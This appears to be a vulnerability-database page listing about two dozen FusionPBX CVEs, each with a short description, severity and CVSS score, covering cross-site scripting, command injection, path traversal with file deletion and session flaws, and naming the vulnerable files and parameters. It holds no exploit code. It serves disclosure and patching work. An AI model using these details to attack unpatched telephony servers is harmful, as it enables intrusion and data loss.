FusionPBX

35 exploits Active since Jun 2019
CVE-2019-11408 WRITEUP MEDIUM WRITEUP
FusionPBX 4.4.3 - Unauthenticated Stored Cross-Site Scripting via Caller ID
XSS in app/operator_panel/index_inc.php in the Operator Panel module in FusionPBX 4.4.3 allows remote unauthenticated attackers to inject arbitrary JavaScript characters by placing a phone call using a specially crafted caller ID number. This can further lead to remote code execution by chaining this vulnerability with a command injection vulnerability also present in FusionPBX.
CVSS 6.1
CVE-2019-11409 WRITEUP HIGH WRITEUP
FusionPBX 4.4.3 - Command Injection
app/operator_panel/exec.php in the Operator Panel module in FusionPBX 4.4.3 suffers from a command injection vulnerability due to a lack of input validation that allows authenticated non-administrative attackers to execute commands on the host. This can further lead to remote code execution when combined with an XSS vulnerability also present in the FusionPBX Operator Panel module.
CVSS 8.8
CVE-2021-43405 WRITEUP HIGH WRITEUP
FusionPBX <4.5.30 - Info Disclosure
An issue was discovered in FusionPBX before 4.5.30. The fax_extension may have risky characters (it is not constrained to be numeric).
CVSS 8.8
CVE-2022-35153 WRITEUP CRITICAL WRITEUP
FusionPBX 5.0.1 - OS Command Injection via Fax Send Endpoint
FusionPBX 5.0.1 was discovered to contain a command injection vulnerability via /fax/fax_send.php.
CVSS 9.8
CVE-2024-24539 WRITEUP MEDIUM WRITEUP
FusionPBX <5.2.0 - Privilege Escalation
FusionPBX before 5.2.0 does not validate a session.
CVSS 5.3
CVE-2019-11407 WRITEUP HIGH WRITEUP
FusionPBX 4.4.3 - Authenticated Sensitive Information Exposure via Operator Panel Debug Information
app/operator_panel/index_inc.php in the Operator Panel module in FusionPBX 4.4.3 suffers from an information disclosure vulnerability due to excessive debug information, which allows authenticated administrative attackers to obtain credentials and other sensitive information.
CVSS 7.2
CVE-2019-16968 WRITEUP MEDIUM WRITEUP
FusionPBX < 4.5.7 - Cross-Site Scripting via conference_control_details.php id Parameter
An issue was discovered in FusionPBX up to 4.5.7. In the file app\conference_controls\conference_control_details.php, an unsanitized id variable coming from the URL is reflected in HTML on 2 occasions, leading to XSS.
CVSS 6.1
CVE-2019-16970 WRITEUP MEDIUM WRITEUP
FusionPBX < 4.5.7 - Cross-Site Scripting via sip_status.php savemsg Parameter
In FusionPBX up to 4.5.7, the file app\sip_status\sip_status.php uses an unsanitized "savemsg" variable coming from the URL, which is reflected in HTML, leading to XSS.
CVSS 6.1
CVE-2019-16971 WRITEUP MEDIUM WRITEUP
FusionPBX < 4.5.7 - Cross-Site Scripting via Unsanitized contact_uuid Variable
In FusionPBX up to 4.5.7, the file app\messages\messages_thread.php uses an unsanitized "contact_uuid" variable coming from the URL, which is reflected on 3 occasions in HTML, leading to XSS.
CVSS 6.1
CVE-2019-16972 WRITEUP MEDIUM WRITEUP
FusionPBX < 4.5.7 - Cross-Site Scripting via Unsanitized ID Parameter
In FusionPBX up to 4.5.7, the file app\contacts\contact_addresses.php uses an unsanitized "id" variable coming from the URL, which is reflected in HTML, leading to XSS.
CVSS 6.1
CVE-2019-16973 WRITEUP MEDIUM WRITEUP
FusionPBX < 4.5.7 - Cross-Site Scripting via Unsanitized Query String
In FusionPBX up to 4.5.7, the file app\contacts\contact_edit.php uses an unsanitized "query_string" variable coming from the URL, which is reflected in HTML, leading to XSS.
CVSS 6.1
CVE-2019-16974 WRITEUP MEDIUM WRITEUP
FusionPBX < 4.5.7 - Cross-Site Scripting via Unsanitized ID Parameter
In FusionPBX up to 4.5.7, the file app\contacts\contact_times.php uses an unsanitized "id" variable coming from the URL, which is reflected in HTML, leading to XSS.
CVSS 6.1
CVE-2019-16975 WRITEUP MEDIUM WRITEUP
FusionPBX < 4.5.7 - Cross-Site Scripting via Unsanitized ID Parameter
In FusionPBX up to 4.5.7, the file app\contacts\contact_notes.php uses an unsanitized "id" variable coming from the URL, which is reflected in HTML, leading to XSS.
CVSS 6.1
CVE-2019-16976 WRITEUP MEDIUM WRITEUP
FusionPBX < 4.5.7 - Cross-Site Scripting via Unsanitized Query String
In FusionPBX up to 4.5.7, the file app\destinations\destination_imports.php uses an unsanitized "query_string" variable coming from the URL, which is reflected on 2 occasions in HTML, leading to XSS.
CVSS 6.1
CVE-2019-16977 WRITEUP MEDIUM WRITEUP
FusionPBX < 4.5.7 - Cross-Site Scripting via Unsanitized Query String
In FusionPBX up to 4.5.7, the file app\extensions\extension_imports.php uses an unsanitized "query_string" variable coming from the URL, which is reflected in HTML, leading to XSS.
CVSS 6.1
CVE-2019-16979 WRITEUP MEDIUM WRITEUP
FusionPBX < 4.5.7 - Cross-Site Scripting via Unsanitized ID Parameter
In FusionPBX up to v4.5.7, the file app\contacts\contact_urls.php uses an unsanitized "id" variable coming from the URL, which is reflected in HTML, leading to XSS.
CVSS 6.1
CVE-2019-16981 WRITEUP MEDIUM WRITEUP
FusionPBX < 4.5.7 - Cross-Site Scripting via Unsanitized ID Parameter
In FusionPBX up to v4.5.7, the file app\conference_profiles\conference_profile_params.php uses an unsanitized "id" variable coming from the URL, which is reflected on 2 occasions in HTML, leading to XSS.
CVSS 6.1
CVE-2019-16983 WRITEUP MEDIUM WRITEUP
FusionPBX < 4.5.7 - Cross-Site Scripting via Paging Function
In FusionPBX up to v4.5.7, the file resources\paging.php has a paging function (called by several pages of the interface), which uses an unsanitized "param" variable constructed partially from the URL args and reflected in HTML, leading to XSS.
CVSS 6.1
CVE-2019-16985 WRITEUP MEDIUM WRITEUP
FusionPBX < 4.5.7 - Unauthenticated Path Traversal and Arbitrary File Deletion via xml_cdr_delete.php
In FusionPBX up to v4.5.7, the file app\xml_cdr\xml_cdr_delete.php uses an unsanitized "rec" variable coming from the URL, which is base64 decoded and allows deletion of any file of the system.
CVSS 6.5
CVE-2019-16987 WRITEUP MEDIUM WRITEUP
FusionPBX < 4.5.7 - Cross-Site Scripting via Unsanitized Query String
In FusionPBX up to v4.5.7, the file app\contacts\contact_import.php uses an unsanitized "query_string" variable coming from the URL, which is reflected in HTML, leading to XSS.
CVSS 6.1
CVE-2019-16988 WRITEUP MEDIUM WRITEUP
FusionPBX < 4.5.7 - Cross-Site Scripting via Eavesdrop Destination Parameter
In FusionPBX up to v4.5.7, the file app\basic_operator_panel\resources\content.php uses an unsanitized "eavesdrop_dest" variable coming from the URL, which is reflected on 3 occasions in HTML, leading to XSS.
CVSS 6.1
CVE-2019-16991 WRITEUP MEDIUM WRITEUP
FusionPBX < 4.5.7 - Cross-Site Scripting via Unsanitized File Parameter
In FusionPBX up to v4.5.7, the file app\edit\filedelete.php uses an unsanitized "file" variable coming from the URL, which is reflected in HTML, leading to XSS.
CVSS 6.1
CVE-2019-19367 WRITEUP MEDIUM WRITEUP
FusionPBX 4.4.1 - Stored Cross-Site Scripting via Fax Files ID Parameter
A cross-site scripting (XSS) vulnerability in app/fax/fax_files.php in FusionPBX 4.4.1 allows remote attackers to inject arbitrary web script or HTML via the id parameter.
CVSS 6.1
CVE-2019-19385 WRITEUP MEDIUM WRITEUP
FusionPBX 4.4.1 - Cross-Site Scripting via app_uuid Parameter
A cross-site scripting (XSS) vulnerability in app/dialplans/dialplans.php in FusionPBX 4.4.1 allows remote attackers to inject arbitrary web script or HTML via the app_uuid parameter.
CVSS 6.1
CVE-2019-19387 WRITEUP MEDIUM WRITEUP
FusionPBX 4.4.1 - Cross-Site Scripting via c Parameter
A cross-site scripting (XSS) vulnerability in app/fifo_list/fifo_interactive.php in FusionPBX 4.4.1 allows remote attackers to inject arbitrary web script or HTML via the c parameter.
CVSS 6.1